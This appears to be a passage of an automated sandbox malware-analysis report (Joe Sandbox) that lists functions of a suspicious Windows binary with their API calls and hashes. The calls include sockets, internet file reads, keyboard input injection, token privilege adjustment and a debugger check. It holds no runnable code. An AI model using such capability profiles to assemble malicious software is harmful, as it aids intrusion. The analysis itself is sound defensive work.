                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3131106179-0
                                                                                                            • Opcode ID: 4cb3685b4a2d52e48f3471a3613dbae56d1ac48b305cc715fcbc1c021c6f2678
                                                                                                            • Instruction ID: 7cd6acb4d6499b2e4194a1e59e3f0d845624e225170ba44e4b1a4c35f0a14d7f
                                                                                                            • Opcode Fuzzy Hash: 4cb3685b4a2d52e48f3471a3613dbae56d1ac48b305cc715fcbc1c021c6f2678
                                                                                                            • Instruction Fuzzy Hash: 4DA13870208544BFE728AA7D8CB8E7BB6DDDB83310F1C011AF142D6691CA35DE06D672
                                                                                                            Function 00DD1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DD304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
                                                                                                              • Part of subcall function 00DD304E: _wcslen.LIBCMT ref: 00DD309B
                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DD185D
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1884
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00DD18DB
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD18E6
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD1915
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1601658205-0
                                                                                                            • Opcode ID: 369d13f04726b748e3cbc113d8b82d7c88304b80348f1396232e33f843fc9f5b
                                                                                                            • Instruction ID: e60fb53f19078cba38c4e73109258f95efd8e9b96aa501ef4cb8b75ac9f7900d
                                                                                                            • Opcode Fuzzy Hash: 369d13f04726b748e3cbc113d8b82d7c88304b80348f1396232e33f843fc9f5b
                                                                                                            • Instruction Fuzzy Hash: 4451A175A00200AFDB20EF24C886F2A77A5EB88718F188059FD559F393D671AD458BB1
                                                                                                            Function 00DE1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                            • String ID:
                                                                                                            • API String ID: 292994002-0
                                                                                                            • Opcode ID: 845f757b22d6bc06dae39417495f5af58f7c51ab9dc7497adf832612a9121d1b
                                                                                                            • Instruction ID: ac35ea00edb711ec8fa2f6852c34c536e27d884a76df9775820fe996c54c28a9
                                                                                                            • Opcode Fuzzy Hash: 845f757b22d6bc06dae39417495f5af58f7c51ab9dc7497adf832612a9121d1b
                                                                                                            • Instruction Fuzzy Hash: F02191357402915FD721AF2BC884B6ABBA5EF85315B2D9068E84ACB351C771EC42CBB0
                                                                                                            Function 00D58060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                            • API String ID: 0-1546025612
                                                                                                            • Opcode ID: 67a6f93223ba72fc63971264a3425ce102c020de5fba4662c4f8e716c95c2cbc
                                                                                                            • Instruction ID: 6d06cf9f30b5352a8b67cfcf13e1a471599c839147611900709de74ec91201a4
                                                                                                            • Opcode Fuzzy Hash: 67a6f93223ba72fc63971264a3425ce102c020de5fba4662c4f8e716c95c2cbc
                                                                                                            • Instruction Fuzzy Hash: 5EA27E70A0061ACBDF25CF58C8407AEB7B1BF54315F2881AAEC55B7284EB70DD85DBA0
                                                                                                            Function 00DB8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DB82AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen
                                                                                                            • String ID: ($tb$|
                                                                                                            • API String ID: 1659193697-1968160224
                                                                                                            • Opcode ID: 97209c37683deb9847a0eab6998e18b814fe691ff1be2970bd68e2cb61f4439e
                                                                                                            • Instruction ID: 93d4328d292b2c770a54e7e45e0721c6a1f396bf1eb4c499ced25472841ba10e
                                                                                                            • Opcode Fuzzy Hash: 97209c37683deb9847a0eab6998e18b814fe691ff1be2970bd68e2cb61f4439e
                                                                                                            • Instruction Fuzzy Hash: 5B322674A00705DFCB28CF59C481AAAB7F4FF48710B15856EE49ADB3A1EB70E941CB64
                                                                                                            Function 00DDA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDA6AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00DDA6BA
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00DDA79C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDA7AB
                                                                                                              • Part of subcall function 00D6CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D93303,?), ref: 00D6CE8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1991900642-0
                                                                                                            • Opcode ID: 9b5c35d8178af5c1e6f55863f1f7fdffda77fd4aa18917ce52879d86084e8cbb
                                                                                                            • Instruction ID: 2f83684c3042ebba2e0d6f140756ad3d6680c2e115f3c59a8ad958193b3c79ed
                                                                                                            • Opcode Fuzzy Hash: 9b5c35d8178af5c1e6f55863f1f7fdffda77fd4aa18917ce52879d86084e8cbb
                                                                                                            • Instruction Fuzzy Hash: 4E513E71508350AFD710EF24D886A6BBBE8FF89754F44891DF98597252EB30D908CBB2
                                                                                                            Function 00DBAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DBAAAC
                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00DBAAC8
                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DBAB36
                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DBAB88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 432972143-0
                                                                                                            • Opcode ID: c63bec50d3c8af483321f40e33c24a5de71bc890985846985bb9d0f0f1321965
                                                                                                            • Instruction ID: b747ebf84971c3f7b260bd8175527a2faadafd981acaa0237d8314dcdf06ae44
                                                                                                            • Opcode Fuzzy Hash: c63bec50d3c8af483321f40e33c24a5de71bc890985846985bb9d0f0f1321965
                                                                                                            • Instruction Fuzzy Hash: 60311630A50348EEFF358B6C8C05BFA7BA6AB45310F08421AF5A2961E0D375C985C77A
                                                                                                            Function 00D8BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D8BB7F
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 00D8BB91
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,00E2121C,000000FF,?,0000003F,?,?), ref: 00D8BC09
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,00E21270,000000FF,?,0000003F,?,?,?,00E2121C,000000FF,?,0000003F,?,?), ref: 00D8BC36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 806657224-0
                                                                                                            • Opcode ID: 7f84073dc914f57cd1e0019f18ed645e0663fee7255802d8d52848bac68f0529
                                                                                                            • Instruction ID: 49034a21ca6683caccd6e78e38fc49854121ab8e3461e611d962a5698aa5457e
                                                                                                            • Opcode Fuzzy Hash: 7f84073dc914f57cd1e0019f18ed645e0663fee7255802d8d52848bac68f0529
                                                                                                            • Instruction Fuzzy Hash: 9131A071904245EFCB11EF69DC8192DBBB8FF6536071842AAF060EB2B1D7309A45DB70
                                                                                                            Function 00DCCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00DCCE89
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00DCCEEA
                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00DCCEFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 234945975-0
                                                                                                            • Opcode ID: 7dedd65df939f7193849057b3481809eca13944c993aed5bb0bfa7fed699d39b
                                                                                                            • Instruction ID: 6901405ae480c2025a7531e1d6e37479ee0bc83de74d868cc2d72031f17cf14f
                                                                                                            • Opcode Fuzzy Hash: 7dedd65df939f7193849057b3481809eca13944c993aed5bb0bfa7fed699d39b
                                                                                                            • Instruction Fuzzy Hash: 29219A719103069BDB209F65C988FAA77FCEF01314F14941EEA4AD7251E770EA458B74
                                                                                                            Function 00DC5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DC5CC1
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00DC5D17
                                                                                                            • FindClose.KERNEL32(?), ref: 00DC5D5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 4d4943f62f271a993a9c98a6c2890107782b94a94e83eacc673a8e8feed4e757
                                                                                                            • Instruction ID: d164a8f939be03c394201b43f0284c40e2ace8c08d1eeb321f190a84d6134b27
                                                                                                            • Opcode Fuzzy Hash: 4d4943f62f271a993a9c98a6c2890107782b94a94e83eacc673a8e8feed4e757
                                                                                                            • Instruction Fuzzy Hash: EC517634604B029FC714DF28D494E9AB7E4FF49314F18855DE99A8B3A2DB30F985CBA1
                                                                                                            Function 00D82622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00D8271A
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D82724
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00D82731
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 17124e95eca1339c502b3d88189d81b19ef881497f3f234e4925555254fc23ca
                                                                                                            • Instruction ID: b0487984aa6c81895ed789bcec5900046474b3bc04d71dc33e806b86f227426d
                                                                                                            • Opcode Fuzzy Hash: 17124e95eca1339c502b3d88189d81b19ef881497f3f234e4925555254fc23ca
                                                                                                            • Instruction Fuzzy Hash: A931B474951318ABCB21DF65DC89B99BBB8EF08310F5081EAE41CA62A1E7309F858F55
                                                                                                            Function 00DC51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00DC51DA
                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DC5238
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00DC52A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1682464887-0
                                                                                                            • Opcode ID: f87d72dbf9c2071444f9a09e7a6ac95766f7ca9ba636f57c75331096a4eb3a0b
                                                                                                            • Instruction ID: 48eab4aa910d0379413f6ce181f3f7c75d70d9ecd6d67ae9b8ece85d3f512689
                                                                                                            • Opcode Fuzzy Hash: f87d72dbf9c2071444f9a09e7a6ac95766f7ca9ba636f57c75331096a4eb3a0b
                                                                                                            • Instruction Fuzzy Hash: 97314B75A10619DFDB00DF54D884EADBBF4FF49314F088099E805AB366DB31E85ACBA0
                                                                                                            Function 00DB16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D6FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D70668
                                                                                                              • Part of subcall function 00D6FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D70685
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
                                                                                                            • GetLastError.KERNEL32 ref: 00DB174A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 577356006-0
                                                                                                            • Opcode ID: 7d790424738f4f4f13f85a01cf63921364b80372e92efa7602f1106b33fcc6d7
                                                                                                            • Instruction ID: 806a859eaf90627b35903318dbbfcf4b120f4597cec84ec592fff32016d76153
                                                                                                            • Opcode Fuzzy Hash: 7d790424738f4f4f13f85a01cf63921364b80372e92efa7602f1106b33fcc6d7
                                                                                                            • Instruction Fuzzy Hash: 3C1191B2414304EFD718AF54ECC6DAAB7BDEB45714B24852EE45697241EB70FC428B70
                                                                                                            Function 00DBD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DBD608
                                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00DBD645
                                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DBD650
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 33631002-0
                                                                                                            • Opcode ID: 2d1f79a18c83c839237630540f4683310734a3f758ca524bac9cdf0b3f8663a9
                                                                                                            • Instruction ID: 8f838fc8bc7c5ece16caeacf73a239be1367e9dad809fc627f573c20c414a3df
                                                                                                            • Opcode Fuzzy Hash: 2d1f79a18c83c839237630540f4683310734a3f758ca524bac9cdf0b3f8663a9
                                                                                                            • Instruction Fuzzy Hash: E9113C75E05328BBDB109F959C85FEFBFBCEB45B50F108115F904E7290D6704A058BA1
                                                                                                            Function 00DB1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DB168C
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DB16A1
                                                                                                            • FreeSid.ADVAPI32(?), ref: 00DB16B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: e6aea6654b8e6aff4be6f1a5bea7e3602688bcb8a230e02c9ca530b4bfcec2ea
                                                                                                            • Instruction ID: e6521362dd8f36c27e385f59b21c9511b1d3b669ba55af88e69312f4cfb59597
                                                                                                            • Opcode Fuzzy Hash: e6aea6654b8e6aff4be6f1a5bea7e3602688bcb8a230e02c9ca530b4bfcec2ea
                                                                                                            • Instruction Fuzzy Hash: 6FF0F475950309FBDB00DFE49C8AAAEBBBCEB08604F504565E501E6281E774AA448A60
                                                                                                            Function 00D74CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000,?,00D828E9), ref: 00D74D09
